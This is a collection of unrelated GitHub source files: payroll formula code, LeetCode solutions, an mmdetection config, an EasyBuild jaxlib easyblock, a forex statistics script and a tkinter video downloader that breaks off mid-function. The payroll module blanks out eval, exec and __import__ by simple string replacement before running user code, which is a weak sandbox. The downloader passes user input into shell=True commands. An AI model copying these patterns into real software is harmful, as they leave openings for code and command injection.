formula_class.pin_list.append(result_line['hhr_fvp_id'])\n elif result_line['hhr_fvp_type'] == 'WC':\n formula_class.pin_acc_list.append(result_line['hhr_fvp_id'])\n\n\n# 处理用户自定义的公式代码\ndef trans_cus_code(code_string):\n \"\"\"处理用户自己写的代码,替换为可执行代码\"\"\"\n\n code_string = code_string.replace('WT[', \"pin_dic[\")\n code_string = code_string.replace('WC[', \"pin_acc_dic[\")\n code_string = code_string.replace('from', \"# \")\n code_string = code_string.replace('import', \"# \")\n code_string = code_string.replace('replace', \" \")\n code_string = code_string.replace('exit', \" \")\n code_string = code_string.replace('eval', \" \")\n code_string = code_string.replace('exec', \" \")\n code_string = code_string.replace('compile', \" \")\n code_string = code_string.replace('__import__', \" \")\n code_string = code_string.replace('globals', \" \")\n code_string = code_string.replace('locals', \" \")\n code_string = code_string.replace('raw_input', \" \")\n code_string = code_string.replace('input', \" \")\n\n code_string = code_string.replace('VR[', 'var[')\n for func in func_list:\n code_string = code_string.replace(func + \"(\", func + '.PyFunction().func_exec(')\n\n return code_string\n\n\n# 创建公式实例\ndef create(tenant_id, formula_id):\n formula_dic = gv.get_run_var_value('ALL_FORMULA_DIC')\n\n log_flag = gv.get_run_var_value('LOG_FLAG')\n pre_log_flag = gv.get_run_var_value('PRE_LOG_FLAG')\n if log_flag != pre_log_flag:\n new_formula = select_formula(tenant_id, formula_id)\n formula_dic[formula_id] = new_formula\n return new_formula\n else:\n \"\"\"创建公式实例,如果已经存在,则在字典中获取\"\"\"\n if formula_id not in formula_dic:\n formula_dic[formula_id] = select_formula(tenant_id, formula_id)\n return formula_dic[formula_id]\n\n\ndef copy_wt(src_wt_obj, tgt_wt_obj):\n tgt_pin_id = tgt_wt_obj.pin_id\n tgt_wt_obj = deepcopy(src_wt_obj)\n tgt_wt_obj.pin_id = tgt_pin_id\n","repo_name":"pmxly/pypayroll","sub_path":"payroll/pyformulas/create_formula.py","file_name":"create_formula.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"12243243583","text":"'''\nSame description as word_ladder.py except:\n\nGiven two words, beginWord and endWord, and a dictionary wordList, return all the shortest transformation sequences\nfrom beginWord to endWord, or an empty list if no such sequence exists.\n\nEach sequence should be returned as a list of the words [beginWord, s1, s2, ..., sk].\n'''\nfrom leetcode import *\n\nclass Solution:\n # Time: O(m*n + m*n + A) where m is the length of words, n is the number of words in list, and A is the number of shortest transformations.\n # Space: O(m*(m*n) + m*n + n) [basically, hash tables + visited/queue sets + backtracking stack] = O(m*(m*n)).\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n wordList.append(beginWord)\n wordToGeneric = {word: [] for word in wordList}\n\n if endWord not in wordToGeneric:\n return []\n\n genericToWord = {}\n for i in range(len(wordList)):\n word = list(wordList[i])\n\n for j in range(len(beginWord)):\n temp = word[j]\n word[j] = '*'\n generic = ''.join(word)\n\n wordToGeneric[wordList[i]].append(generic)\n words = genericToWord.get(generic, set())\n words.add(wordList[i])\n genericToWord[generic] = words\n\n word[j] = temp\n\n visited = {beginWord: None}\n queue = {beginWord}\n while len(queue) != 0:\n nextQueue = set()\n for wordi in queue:\n if wordi == endWord:\n break\n\n for generic in wordToGeneric[wordi]:\n for wordj in genericToWord[generic]:\n if wordj not in visited:\n nextQueue.add(wordj)\n visited[wordj] = {wordi}\n elif wordj in nextQueue and wordi not in visited[wordj]:\n visited[wordj].add(wordi)\n\n queue = nextQueue\n\n\n ladders = []\n def dfs(startWord, path):\n path.append(startWord)\n\n if visited[startWord] is None:\n ladders.append(list(reversed(path)))\n else:\n for word in visited[startWord]:\n dfs(word, path)\n\n path.pop()\n return\n\n if endWord not in visited:\n return ladders\n\n dfs(endWord, [])\n return ladders\n\nsolution = Solution()\n\n# Expected: [[\"hit\",\"hot\",\"dot\",\"dog\",\"cog\"],[\"hit\",\"hot\",\"lot\",\"log\",\"cog\"]]\nprint(solution.findLadders(beginWord = \"hit\", endWord = \"cog\", wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]))\n\n# Expected: []\nprint(solution.findLadders(beginWord = \"hit\", endWord = \"cog\", wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]))\n","repo_name":"abespitalny/CodingPuzzles","sub_path":"Leetcode/word_ladder_II.py","file_name":"word_ladder_II.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10902703609","text":"\ncheckpoint_config = dict(interval=8, max_keep_ckpts=3)\n\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'), \n dict(\n type='WandbLoggerHook',\n init_kwargs=dict(\n project='one-stage-model',\n name='LIM-deformable-DETR-SGD',\n entity='canvas11')\n )\n ])\n# yapf:enable\ncustom_hooks = [dict(type='NumClassCheckHook')]\n\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from ='https://download.openmmlab.com/mmdetection/v2.0/deformable_detr/deformable_detr_twostage_refine_r50_16x2_50e_coco/deformable_detr_twostage_refine_r50_16x2_50e_coco_20210419_220613-9d28ab72.pth'\nresume_from = None\nworkflow = [('train', 1)]\n\nevaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')\n","repo_name":"boostcampaitech3/level2-object-detection-level2-cv-11","sub_path":"selim/universeNet/configs/_deformable_detr/detr_runtime.py","file_name":"detr_runtime.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"14997588474","text":"'''\nLeetCode 2812: https://leetcode.com/problems/find-the-safest-path-in-a-grid/\nFind the path with the maximum safeness factor.\n\nManhattan distance between two cells: |x1 - x2| + |y1 - y2|\n\nFirst locate the thieves, then look for the path whose minimum Manhattan\ndistance to any thief is as large as possible, while also checking that\nthe path is actually walkable.\n\n\nOne option is to binary-search the answer:\n\nmaximize the minimum distance to any 1-cell\n1. mark the forbidden cells (every cell within the candidate distance of a 1 is unwalkable)\n2. check whether the bottom-right corner is still reachable\n\nClose to O(n^2): label each cell with its distance to the nearest 1.\n'''\n\n\nclass Solution:\n    def maximumSafenessFactor(self, grid: list[list[int]]) -> int:\n        n = len(grid)\n        # Multi-source BFS:\n\n        # matrix of distances to the nearest thief\n        dis = [[-1] * n for _ in range(n)]\n        q = []\n        for i, row in enumerate(grid):\n            for j, x in enumerate(row):\n                if x:\n                    q.append((i, j))\n                    dis[i][j] = 0\n\n        # multi-source BFS with a rolling queue\n        groups = [q]\n        while q:\n            temp = q\n            q = []\n            for x, y in temp:\n                for dx,dy in zip([-1,0,1,0], [0,-1,0,1]):\n                    nx,ny = x+dx,y+dy\n                    if 0 <= nx < n and 0 <= ny < n and grid[nx][ny] == 0 and dis[nx][ny] == -1:\n                        dis[nx][ny] = dis[x][y] + 1\n                        q.append((nx,ny))\n            # each BFS layer of newly reached cells is appended as a group\n            groups.append(q)\n\n        # union-find (DSU) template\n        fa = list(range(n * n))\n        def find(x: int) -> int:\n            if fa[x] != x:\n                fa[x] = find(fa[x])\n            return fa[x]\n\n        # The last group is empty, so start from the second-to-last; return d once distance d connects the start to the bottom-right corner.\n        for d in range(len(groups) - 2, 0, -1):\n            for i, j in groups[d]:\n                for x, y in (i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1):\n                    # besides the bounds check, only merge neighbours whose distance is at least our own: dis[x][y] >= dis[i][j]\n                    if 0 <= x < n and 0 <= y < n and dis[x][y] >= dis[i][j]:\n                        fa[find(x * n + y)] = find(i * n + j) # the union step\n            if find(0) == find(n * n - 1): # checking here is slightly faster\n                return d\n        return 0","repo_name":"FuntestechGithub/algorithm","sub_path":"算法/提高算法模版/搜索/多源bfs/多源bfs-应用-找出最安全路径.py","file_name":"多源bfs-应用-找出最安全路径.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
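For reference, a standalone sketch of the union-find idiom the solution relies on: path compression keeps find() near-constant, and grid cells are flattened to indices i * n + j before merging. make_dsu is an illustrative name:

def make_dsu(size):
    fa = list(range(size))
    def find(x):
        if fa[x] != x:
            fa[x] = find(fa[x])  # path compression
        return fa[x]
    def union(x, y):
        fa[find(x)] = find(y)
    return find, union

find, union = make_dsu(4)
union(0, 1); union(2, 3)
print(find(0) == find(1), find(0) == find(3))  # True False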
+{"seq_id":"31325283294","text":"import os\nimport tempfile\n\nfrom distutils.version import LooseVersion\n\nimport easybuild.tools.environment as env\nfrom easybuild.easyblocks.generic.pythonpackage import PythonPackage\nfrom easybuild.framework.easyconfig import CUSTOM\nfrom easybuild.tools.build_log import EasyBuildError\nfrom easybuild.tools.filetools import apply_regex_substitutions, which\nfrom easybuild.tools.modules import get_software_root, get_software_version\n\n\nclass EB_jaxlib(PythonPackage):\n \"\"\"Support for installing jaxlib. Extension of the existing PythonPackage easyblock\"\"\"\n\n @staticmethod\n def extra_options():\n \"\"\"Custom easyconfig parameters specific to jaxlib.\"\"\"\n extra_vars = PythonPackage.extra_options()\n\n extra_vars['use_pip'][0] = True\n # Run custom build script and install the generated whl file\n extra_vars['buildcmd'][0] = '%(python)s build/build.py'\n extra_vars['install_src'][0] = 'dist/*.whl'\n\n # Custom parameters\n extra_vars.update({\n 'use_mkl_dnn': [True, \"Enable support for Intel MKL-DNN\", CUSTOM],\n })\n\n return extra_vars\n\n def configure_step(self):\n \"\"\"Custom configure step for jaxlib.\"\"\"\n\n super(EB_jaxlib, self).configure_step()\n\n binutils_root = get_software_root('binutils')\n if not binutils_root:\n raise EasyBuildError(\"Failed to determine installation prefix for binutils\")\n config_env_vars = {\n # This is the binutils bin folder: https://github.com/tensorflow/tensorflow/issues/39263\n 'GCC_HOST_COMPILER_PREFIX': os.path.join(binutils_root, 'bin'),\n }\n\n # Collect options for the build script\n # Used only by the build script\n\n # C++ flags are set through copt below\n options = ['--target_cpu_features=default']\n\n # Passed directly to bazel\n bazel_startup_options = [\n '--output_user_root=%s' % tempfile.mkdtemp(suffix='-bazel', dir=self.builddir),\n ]\n\n # Passed to the build command of bazel\n bazel_options = [\n '--jobs=%s' % self.cfg['parallel'],\n '--subcommands',\n '--action_env=PYTHONPATH',\n '--action_env=EBPYTHONPREFIXES',\n ]\n if self.toolchain.options.get('debug', None):\n bazel_options.extend([\n '--strip=never',\n '--copt=\"-Og\"'\n ])\n # Add optimization flags set by EasyBuild each as a separate option\n bazel_options.extend(['--copt=%s' % i for i in os.environ['CXXFLAGS'].split(' ')])\n\n cuda_root = get_software_root('CUDA')\n if cuda_root:\n cudnn_root = get_software_root('cuDNN')\n if not cudnn_root:\n raise EasyBuildError('For CUDA-enabled builds cuDNN is also required')\n cuda_version = '.'.join(get_software_version('CUDA').split('.')[:2]) # maj.minor\n cudnn_version = '.'.join(get_software_version('cuDNN').split('.')[:3]) # maj.minor.patch\n options.extend([\n '--enable_cuda',\n '--cuda_path=' + cuda_root,\n '--cuda_compute_capabilities=' + self.cfg.get_cuda_cc_template_value('cuda_compute_capabilities'),\n '--cuda_version=' + cuda_version,\n '--cudnn_path=' + cudnn_root,\n '--cudnn_version=' + cudnn_version,\n ])\n\n if LooseVersion(self.version) >= LooseVersion('0.1.70'):\n nccl_root = get_software_root('NCCL')\n if nccl_root:\n options.append('--enable_nccl')\n else:\n options.append('--noenable_nccl')\n\n config_env_vars['GCC_HOST_COMPILER_PATH'] = which(os.getenv('CC'))\n else:\n options.append('--noenable_cuda')\n\n if self.cfg['use_mkl_dnn']:\n options.append('--enable_mkl_dnn')\n else:\n options.append('--noenable_mkl_dnn')\n\n # Prepend to buildopts so users can overwrite this\n self.cfg['buildopts'] = ' '.join(\n options +\n ['--bazel_startup_options=\"%s\"' % i for 
i in bazel_startup_options] +\n ['--bazel_options=\"%s\"' % i for i in bazel_options] +\n [self.cfg['buildopts']]\n )\n\n for key, val in sorted(config_env_vars.items()):\n env.setvar(key, val)\n\n # Print output of build at the end\n apply_regex_substitutions('build/build.py', [(r' shell\\(command\\)', ' print(shell(command))')])\n","repo_name":"easybuilders/easybuild-easyblocks","sub_path":"easybuild/easyblocks/j/jaxlib.py","file_name":"jaxlib.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"70"}
+{"seq_id":"30960694069","text":"Q = 10**9+7\ndef cmb(n,r):\n    if n-r < r: r = n-r\n    if r == 0: return 1\n    denominator = 1 # denominator\n    numerator = 1 # numerator\n    for i in range(r):\n        numerator *= n-i\n        numerator %= Q\n        denominator *= i+1\n        denominator %= Q\n    return numerator*pow(denominator, Q-2, Q)%Q\n\ndef main():\n    N, M = map( int, input().split())\n    A = list(map(int,input().split()))\n    n = N + M\n    r = N + sum(A)\n    if sum(A) > M:\n        print(0)\n        return\n    \n    print(cmb(n,r))\nif __name__ == '__main__':\n    main()\n","repo_name":"kamojiro/atcoderall","sub_path":"regular/110/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
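A note on the pow(denominator, Q-2, Q) step in cmb above: since Q = 10**9+7 is prime, Fermat's little theorem gives d**(Q-1) ≡ 1 (mod Q), so d**(Q-2) is the modular inverse of d, and multiplying by it stands in for division. A quick check:

Q = 10**9 + 7
d = 123456
inv = pow(d, Q - 2, Q)  # modular inverse of d
print(d * inv % Q)  # 1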
+{"seq_id":"70135916708","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy\nfrom os import listdir, getcwd, makedirs, name, pardir\nfrom os.path import isfile, isdir, join, splitext, basename, abspath, exists\nfrom math import log10, floor\nfrom collections import defaultdict\nimport csv\n\nQUIET = False\n\n#***** Global Variables *****\n#Data paths\ncwd = getcwd()\n\n# ***** Constants *****\nPARENT = parent = abspath(join(cwd, pardir))\n#root data directory\nDATA_DIR = join(parent, \"data\")\n#directory containing currency spread data\t\nSPREAD_DATA_DIR = join(DATA_DIR, \"processed-data\")\t\n#directory containing the statistics data\nSTATS_DIR = join(DATA_DIR, \"currency-stats\")\n\n#List of all years and months considered for data directories\nyears = [2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017]\nmonths = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\" ]\n#Save cutoff points for each currency based on the base year\ncutoff_points = {\"AUDJPY\": 0.06, \"AUDUSD\": 0.00045, \"EURAUD\": 0.0009, \\\n\t\t\t\t\"EURGBP\": 0.00027, \"EURJPY\": 0.04, \"EURUSD\": 0.0003,\\\n\t\t\t\t\"GBPAUD\": 0.0009, \"GBPJPY\": 0.07, \"GBPUSD\": 0.0004, \\\n\t\t\t\t\"USDJPY\": 0.03}\nMAX_BINS = 50 #Maximum number of data bins to use\n\n\nclass CurrencyStats:\n\tdef __init__(self, currency=\"Currency\", df={'spread': [1,2,3]}, year=\"Year\", month=\"Month\"):\n\t\tself.full_name = currency\n\t\t#Get the 6-character currency name from the cross filename\n\t\tself.short_name = currency.split('_', 1)[0]\n\t\tself.readable_name = self.short_name[:3] + \"/\" + self.short_name[3:]\n\t\tself.year = year\n\t\tself.month = month\n\t\ttry:\n\t\t\tself.mean = df.spread.mean()\n\t\t\tself.std_dev = df.spread.std()\n\t\t\tself.min = df.spread.min()\n\t\t\tself.max = df.spread.max()\n\t\t\t#The cutoff value for the last bin is pulled from a pre-defined dictionary\n\t\t\tself.cutoff = cutoff_points[self.short_name]\n\n\t\t\t'''Non-outlier data is defined as all values less than or equal to\n\t\t\tthe cutoff point for the currency'''\n\t\t\tnon_outlier = df.spread <= self.cutoff\n\t\t\tnon_outlier_frame = df[non_outlier]\n\n\t\t\t#Bin based on unique values up to a cutoff point\n\t\t\tself.bins = non_outlier_frame.spread.nunique()\n\t\t\t#self.bins = df.spread.nunique()\n\n\t\t\t#Total number of ticks for the currency\n\t\t\tself.ticks = df.spread.count()\n\n\t\t\t#Clipped data allows for binning outlier values\n\t\t\tself.clipped_data = numpy.clip(\\\n\t\t\t\tdf.spread, df.spread.min(), self.cutoff)\n\n\t\t\t#List of most frequent bid-ask values\n\t\t\tself.frequent_values = []\n\t\texcept:\n\t\t\tself.mean = 0\n\t\t\tself.std_dev = 0\n\t\t\tself.min = 0\n\t\t\tself.max = 0\n\t\t\tself.cutoff = 0\n\t\t\tself.bins = 0\n\t\t\tself.ticks = 0\n\t\t\tself.frequent_values = []\n\t\t\t#self.clipped_data = None\n\n\t'''Load currency data from a csv file row'''\n\tdef loadData(self, d):\n\t\tself.full_name = d[0]\n\t\tself.short_name = d[1]\n\t\tself.readable_name = d[2]\n\t\tself.year = d[3]\n\t\tself.month = d[4]\n\t\tself.mean = float(d[5])\n\t\tself.std_dev = float(d[6])\n\t\tself.min = float(d[7])\n\t\tself.max = float(d[8])\n\t\tself.cutoff = float(d[9])\n\t\tself.bins = int(d[10])\n\n#Read in the header of a csv file and return it as a list\ndef readHeader(file):\n\theader = []\n\twith open(file, 'r+') as csvfile:\n\t\treader = csv.reader(csvfile)\n\t\theader = next(reader)\n\treturn 
header\n\n#Read the first @samples number of cells in the given column, and return the\n#highest number of decimal points encountered in any of the samples\ndef getColumnPrecision(dataframe, column, samples):\n\tprecision = 0\n\tfor i in range(0, samples):\n\t\tval = str(dataframe[column][i])\n\t\t#Get number of values after the decimal\n\t\tvalStr = val.split('.')[1]\n\t\tif (len(valStr) > precision):\n\t\t\tprecision = len(valStr)\n\treturn precision\n\n\n'''\nGenerate the statistics data for all currencies in a directory\nArguments:\n\t* stats_list: list of Stats objects to be generated\n\t* SPREAD_DATA_DIR: root directory containing yearly cross directories\n'''\ndef genStatsData(stats_list, month_dir, month, year):\n\tfor currency in listdir(month_dir):\n\t\tprint(\"Generating stats for {}\".format(currency))\n\t\tstats = CurrencyStats\n\t\tcurrency_path = join(month_dir, currency)\n\t\tdf = pd.read_csv(currency_path, sep=',', \\\n\t\t\tfloat_precision=\"round_trip\",usecols=[\"spread\"])\n\t\tstats = CurrencyStats(currency, df, year, month)\n\t\tstats_list[stats.short_name].append(stats)\n\treturn stats_list\n\n'''Save all generated statistics data for currency files'''\ndef saveStatsData(dir, filename, stats_list):\n\tfilepath = join(dir, filename)\n\t#If file doesn't exist, create it and write the header\n\tif not exists(filepath):\n\t\twith open(filepath, 'w+', newline='\\n') as file:\n\t\t\twriter = csv.writer(file)\n\t\t\twriter.writerow([\"Full name\"] + [\"Short Name\"] + [\"Readable Name\"] + \\\n\t\t\t[\"Year\"] + [\"Month\"] + [\"Mean\"] + [\"Std Dev\"] + [\"Min\"] + [\"Max\"] + \\\n\t\t\t[\"Cutoff\"] + [\"Bins\"] + [\"Ticks\"])\n\t#Write data to file\n\tfor currency in stats_list.keys():\n\t\tfor stats in stats_list[currency]:\n\t\t\twith open(filepath, 'a+', newline='\\n') as file:\n\t\t\t\twriter = csv.writer(file)\n\t\t\t\twriter.writerow(\\\n\t\t\t\t\t[stats.full_name] + [stats.short_name] + \\\n\t\t\t\t\t[stats.readable_name] + [stats.year] + \\\n\t\t\t\t\t[stats.month] + [stats.mean] + \\\n\t\t\t\t\t[stats.std_dev] + [stats.min] + \\\n\t\t\t\t\t[stats.max] + [stats.cutoff] + [stats.bins] + \\\n\t\t\t\t\t[stats.ticks])\n\n'''Set the cutoff points for each currency to the base year cutoff value'''\ndef setCutoffs(stats_list):\n\tfor currency in stats_list.keys():\n\t\tfor stats in stats_list[currency]:\n\t\t\tstats.cutoff = cutoff_points[stats.short_name]\n\n'''Set the number of bins for each currency to the max number of bins in all years'''\ndef setBins(stats_list):\n\tfor currency in stats_list.keys():\n\t\tmax_currency_bins = 0\n\t\tfor stats in stats_list[currency]:\n\t\t\tif stats.bins > max_currency_bins:\n\t\t\t\tmax_currency_bins = stats.bins\n\t\tfor stats in stats_list[currency]:\n\t\t\tstats.bins = min(max_currency_bins, MAX_BINS)\n\n'''Generate the statistics data for the key set of currencies if it does not already exist.'''\ndef genStatsDataKeyYears(stats_list):\n\tfor month, year in sample_data:\n\t\tyear_dir = join(SPREAD_DATA_DIR, year)\n\t\tif not isdir(year_dir):\n\t\t\tprint(\"Error: directory \" + year_dir + \" not found. 
Skipping directory...\")\n\t\t\tcontinue\n\t\tmonth_dir = join(year_dir, month)\n\t\tcurrencies = [currency for currency in listdir(month_dir) if \\\n\t\t\t(isfile(join(month_dir, currency)))]\n\t\t#Generate statistics data for all currencies\n\t\tfor currency in currencies:\n\t\t\tstats = CurrencyStats\n\t\t\t#path to currency data\n\t\t\tcurrency_path = join(month_dir, currency)\n\t\t\t#read in the data\n\t\t\tdf = pd.read_csv(currency_path, sep=',', float_precision=\"round_trip\",\\\n\t\t\t\tusecols=[\"spread\"])\n\t\t\t#Generate statistics from the raw data\n\t\t\tstats = CurrencyStats(currency, df, year, month)\n\t\t\t'''Add the current currency stats to the dictionary list based on the short name of the currency'''\n\t\t\tstats_list[stats.short_name].append(stats)\n\treturn stats_list\n\ndef main():\n\tstats_list = defaultdict(list) #Dictionary of lists of currencies\n\n\tif not exists(STATS_DIR):\n\t\tprint(\"Creating stats directory...\")\n\t\tmakedirs(STATS_DIR)\n\n\t#Get a list of all directories to generate stats from \n\tyear_list = [year for year in listdir(SPREAD_DATA_DIR) if year in str(years)]\n\tfor year in year_list:\n\t\tyear_dir = join(SPREAD_DATA_DIR, year)\n\t\t#Generate monthly stats\n\t\tfor month in listdir(year_dir):\n\t\t\t#Only recurse into actual monthly data directories\n\t\t\tif month not in months:\n\t\t\t\tcontinue\n\t\t\tmonth_dir = join(year_dir, month)\n\t\t\tstats_list = genStatsData(stats_list, month_dir, month, year)\n\n\t\t\t#Save the raw statistics\n\t\t\t#saveStatsData(STATS_DIR, \"currency_statistics_raw.csv\", stats_list)\n\n\t\t\t#Save statistics with cutoff\n\t\t\tsaveStatsData(STATS_DIR, \"currency_statistics_outlier.csv\", stats_list)\n\n\t\t\t#Save a copy of the data with the altered bins\n\t\t\tsetCutoffs(stats_list)\n\t\t\tsetBins(stats_list)\n\t\t\tsaveStatsData(STATS_DIR, \"currency_statistics_50_bins.csv\", stats_list)\n\t\t\t\n\t\t\t#Clear the stats list\n\t\t\tstats_list = defaultdict(list)\n\t\n\tprint(\"Finished generating statistics...\")\n\t\n\nif (__name__ == \"__main__\"):\n\tmain()\n","repo_name":"kmboese/forex-market-analysis","sub_path":"src/gen_yearly_stats.py","file_name":"gen_yearly_stats.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
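A small sketch of the clipping idea used in CurrencyStats above: numpy.clip folds every spread value above the cutoff into the last bin instead of discarding it, so outliers still count toward the histogram. The values here are made up:

import numpy as np

spread = np.array([0.0001, 0.0003, 0.0009, 0.05])
clipped = np.clip(spread, spread.min(), 0.001)
print(clipped.max())  # 0.001 -- everything above the cutoff is capped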
+{"seq_id":"16595924516","text":"import tkinter as tk\r\nimport tkinter.ttk as ttk\r\nfrom tkinter.filedialog import *\r\nimport threading\r\nimport subprocess as sub\r\nimport os\r\nimport time\r\nimport ffmpy\r\n\r\n\r\ndef firstpage():\r\n    global frame1\r\n    global frame2\r\n    global frame9\r\n    global currentpage\r\n    # sw = window.winfo_screenwidth()\r\n    # sh = window.winfo_screenheight()\r\n    # w = 700\r\n    # h = 500\r\n    # window.geometry(\"{0}x{1}+{2}+{3}\".format(w, h, int((sw - w) / 2), int((sh - h) / 2)))\r\n    if currentpage != frame1:\r\n        currentpage.pack_forget() # hide the current page (it is not destroyed)\r\n        currentpage = frame1\r\n        currentpage.pack() # show page 1\r\n\r\n\r\ndef secondpage():\r\n    global frame1, frame2, frame9, currentpage\r\n    # sw = window.winfo_screenwidth()\r\n    # sh = window.winfo_screenheight()\r\n    # w = 1080\r\n    # h = 720\r\n    # window.geometry(\"{0}x{1}+{2}+{3}\".format(w, h, int((sw - w) / 2), int((sh - h) / 2)))\r\n    if currentpage != frame2:\r\n        currentpage.pack_forget() # hide the current page (it is not destroyed)\r\n        currentpage = frame2\r\n        currentpage.pack() # show page 2\r\n\r\n\r\ndef threepage():\r\n    global frame1, frame2, frame9, currentpage\r\n    if currentpage != frame9:\r\n        currentpage.pack_forget()\r\n        currentpage = frame9\r\n        currentpage.pack()\r\n\r\n\r\n# Functions wired to the buttons\r\ndef create_frame():\r\n    # Page one\r\n    global frame1, frame2, frame9, currentpage\r\n    frame1 = tk.Frame(window, relief='sunken')\r\n    frame3 = tk.Frame(frame1, relief=\"sunken\")\r\n    frame4 = tk.Frame(frame1, relief=\"sunken\")\r\n    frame5 = tk.Frame(frame1, relief='sunken')\r\n    frame3.pack()\r\n    frame4.pack()\r\n    frame5.pack()\r\n\r\n    def thread_it(func, *args):\r\n        t = threading.Thread(target=func, args=args)\r\n        t.daemon = True\r\n        t.start()\r\n\r\n    def thread_it1(func, *args):\r\n        t1 = threading.Thread(target=func, args=args)\r\n        t1.daemon = True\r\n        t1.start()\r\n\r\n    def thread_it2(func, *args):\r\n        t2 = threading.Thread(target=func, args=args)\r\n        t2.daemon = True\r\n        t2.start()\r\n\r\n    def conversion():\r\n        listbox1.delete('0', 'end')\r\n        listbox1.insert('0', '开始转换')\r\n        source_file = entry3.get()\r\n        name = source_file.split('/')[-1].split('.')[0]\r\n        sink_file = entry4.get() + '/' + name + \".\" + layout.get()\r\n        listbox1.insert('end', '转换中........')\r\n        try:\r\n            ff = ffmpy.FFmpeg(\r\n                inputs={source_file: None},\r\n                outputs={sink_file: None})\r\n            ff.run()\r\n            window.update()\r\n            listbox1.insert('end', \"转换成功\")\r\n            window.update()\r\n        except Exception as e:\r\n            listbox1.insert('end', e)\r\n            listbox1.insert('end', \"转换失败\")\r\n\r\n    def select_way():\r\n        waypath_ = askopenfilename()\r\n        entry3.insert('0', waypath_)\r\n\r\n    def selection_address():\r\n        if len(entry4.get()) == 0:\r\n            path_ = askdirectory()\r\n            entry4.insert(\"0\", path_)\r\n        else:\r\n            if not os.path.exists(entry4.get()):\r\n                os.mkdir(entry4.get())\r\n\r\n    def select_address():\r\n        if len(entry2.get()) == 0:\r\n            path_ = askdirectory()\r\n            window.update()\r\n            time.sleep(5)\r\n            entry2.insert('end', path_)\r\n            listbox.delete('0', 'end')\r\n        else:\r\n            if not os.path.exists(entry2.get()):\r\n                os.mkdir(entry2.get())\r\n            path_ = entry2.get()\r\n            window.update()\r\n            time.sleep(5)\r\n            entry2.insert('end', path_)\r\n            listbox.delete('0', 'end')\r\n        try:\r\n            listbox.delete(\"0\", 'end')\r\n            listbox.insert('0', '正在获取视频信息')\r\n            cmd0 = f'you-get -i {entry1.get()}'\r\n            window.update()\r\n            p = sub.Popen(cmd0, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n            for line in iter(p.stdout.readline, b''):\r\n                listbox.insert('end', line.decode('UTF-8'))\r\n                if sub.Popen.poll(p) is not None:\r\n                    if line == \"\":\r\n                        break\r\n            p.stdout.close()\r\n            window.update()\r\n        except Exception as e:\r\n            listbox.insert(\"end\", \"错误提示:\")\r\n            listbox.insert('end', e)\r\n            listbox.insert(\"end\", \"获取信息失败\")\r\n\r\n    def select_address1():\r\n        if len(entry6.get()) == 0:\r\n            path_ = askdirectory()\r\n            window.update()\r\n            entry6.insert('end', path_)\r\n            listbox2.delete('0', 'end')\r\n            listbox2.insert('0', '开始获取视频信息')\r\n        else:\r\n            if not os.path.exists(entry6.get()):\r\n                os.mkdir(entry6.get())\r\n            path_ = entry6.get()\r\n            window.update()\r\n            entry6.insert('end', path_)\r\n            listbox2.delete('0', 'end')\r\n            listbox2.insert('0', '正在获取视频信息')\r\n        try:\r\n            window.update()\r\n            window.update()\r\n            cmd1 = f'you-get -i --playlist {entry5.get()}'\r\n            window.update()\r\n            p = sub.Popen(cmd1, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n            for line in iter(p.stdout.readline, b''):\r\n                listbox2.insert('end', line.decode('UTF-8'))\r\n                if sub.Popen.poll(p) is not None:\r\n                    if line == \"\":\r\n                        break\r\n            p.stdout.close()\r\n            listbox2.insert('end', '获取结束')\r\n            window.update()\r\n            window.update()\r\n        except Exception as e:\r\n            listbox2.insert(\"end\", \"错误提示:\")\r\n            listbox2.insert('end', e)\r\n            listbox2.insert(\"end\", \"获取信息失败\")\r\n\r\n    def download():\r\n        window.update()\r\n        listbox.delete('0', 'end')\r\n        listbox.insert('0', \"开始下载\")\r\n        try:\r\n            window.update()\r\n            urls = entry1.get()\r\n            dirctory = entry2.get()\r\n            difinition = select_download.get()\r\n            difinit = '--format=' + difinition\r\n            window.update()\r\n            window.update()\r\n            listbox.insert(\"end\", \"正在下载..........\")\r\n            cmd2 = f'you-get -o {dirctory} {difinit} {urls}'\r\n            window.update()\r\n            p = sub.Popen(cmd2, stdin=sub.PIPE, stdout=sub.PIPE, stderr=sub.PIPE, shell=True)\r\n            for line in iter(p.stdout.readline, b''):\r\n                listbox.insert('end', line.decode('UTF-8'))\r\n                if sub.Popen.poll(p) is not None:\r\n                    if line == \"\":\r\n                        break\r\n            p.stdout.close()\r\n            window.update()\r\n            listbox.insert('end', \"下载成功\")\r\n        except Exception as e:\r\n            listbox.insert(\"end\", \"错误提醒:\")\r\n            listbox.insert('end', e)\r\n            listbox.insert('end', '下载失败')\r\n\r\n    def download1():\r\n        window.update()\r\n        listbox2.delete('0', 'end')\r\n        listbox2.insert('0', \"开始下载\")\r\n        window.update()\r\n        urls = 